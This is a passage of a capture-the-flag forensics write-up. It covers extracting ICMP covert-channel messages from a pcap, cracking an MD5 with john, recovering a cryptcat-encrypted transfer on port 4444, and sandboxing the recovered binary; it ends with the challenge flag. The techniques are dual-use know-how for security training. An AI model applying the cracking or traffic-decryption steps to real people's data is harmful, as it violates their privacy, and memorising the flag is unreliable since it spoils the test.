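    pattern filter matters) plus echo requests carrying the messages. Checksums are 0."""
    def echo_frame(pkt_ident: int, seq: int, payload: bytes) -> bytes:
        icmp = struct.pack("!BBHHH", 8, 0, 0, pkt_ident, seq) + payload
        ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, 1, 0,
                         bytes([192, 168, 55, 64]), bytes([192, 168, 55, 187])) + icmp
        return b"\x00" * 12 + b"\x08\x00" + ip            # zeroed MACs, EtherType IPv4
    stock = b"\x00" * 8 + bytes(range(0x08, 0x38))         # timestamp + incrementing bytes
    frames = [echo_frame(0x1234, 1, stock), echo_frame(ident, 1, stock)]
    frames += [echo_frame(ident, i + 2, m) for i, m in enumerate(messages)]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    pcap = build_sample_pcap([b"bro, what you up to?", b"n2m", b"hash is good"])
    print(extract_covert_data(pcap, 31337).decode())
```

Filtering on the identifier alone would have pulled in any ordinary ping that happened to reuse 31337, which is why the collector checks both; in a real capture you would also want to split by direction (request versus reply) if both ends are talking, as they are here.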
The information from this convo that we care about is the hash 7181f4d45de00ae35b6cf8201c8d852b, which we can run through Name That Hash to confirm that it's an MD5, or raw-md5 in John. We can try to crack it with john:
echo 7181f4d45de00ae35b6cf8201c8d852b > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=raw-md5
But there were no results. Given the context ("okay, it's sent", then the hash, then "hash is good"), this reads more like an integrity check of whatever was transferred than a password, so it is worth keeping to verify a decrypted payload against later. We also know that they said they would be using the Metasploit port to receive, which is port 4444 (Metasploit's default handler port). So we can filter the traffic down to just that port and see if there's anything interesting:
tcp.port == 4444
Applying data.data as a column makes the data easier to visualize. When we do that, we can see that the data is coming from the remote IP 192.168.55.187, so we can apply that as a filter as well to further narrow down the data we're looking at. All the data can be extracted via tshark:
tshark -r pcap_chal.pcap -Y '(tcp.port == 4444 && ip.src == 192.168.55.187)' -T fields -e data.data
And we can pipe the output to xxd to turn the hex back into raw bytes:
tshark -r pcap_chal.pcap -Y '(tcp.port == 4444 && ip.src == 192.168.55.187)' -T fields -e data.data | xxd -r -p > payload.bin
The data is gibberish, so it looks like a binary of some kind. Running file payload.bin only says that it's data, so a header may be missing or we may have to be more creative about running it. There were no useful results from strings and binwalk came up empty. It has to be encrypted somehow, otherwise there's no way to know what to do with it.
The tool mcrypt can decrypt files and, for files it produced itself, reads the algorithm from its own header, so I gave that a go:
sudo apt install mcrypt
cat payload.bin | mcrypt -d -z
The command told us that the file was OpenPGP encrypted, so I tried decrypting with the password RedRoverRedRover$$ from earlier, and it failed. I pulled the thread of "Angela Bennett uses it to log into the Bethesda Naval Hospital" by going to this site (also in our PCAP) and tried using natoar23ae, but that didn't work either! In hindsight the chat already told us what we were looking at: the file went over cryptcat, which is netcat with Twofish encryption keyed by whatever is passed to -k, so mcrypt's guess about a stream it did not produce is not worth much, and the way forward is to replay the captured stream through cryptcat itself with the right key.
The steps that finally worked:
-
Filter on tcp.port==4444 and export the specified packets to cryptcat.pcap
-
Start cryptcat as the decrypting listener (the key comes from the film reference in the chat): cryptcat -vv -k BER5348833 -l -p 4444 > decryptedfile
-
Prepare the data for netcat to send with tcptrace -e cryptcat.pcap (install with sudo apt install tcptrace); -e writes each direction of every TCP stream to its own *_contents.dat file
-
Send the sender's side of the stream to the listener with nc -vv -w 1 localhost 4444 < a2b_contents.dat
-
Check what came out with file decryptedfile
The decrypted file is the binary that was transferred. To see what it does without letting it reach a real server, set up a fake IRC server: add 127.0.0.1 irc.cct to /etc/hosts (sudo nano /etc/hosts), capture on loopback with Wireshark or with sudo tcpdump -i lo -s 65535 -w irc.pcap, execute the fake server with python3 fake-irc.py, then run the binary.
Answer: CCT{h3's_a_pc@p_w1z@rd_th3re_h4s_g0t_to_6e_a_7w1st}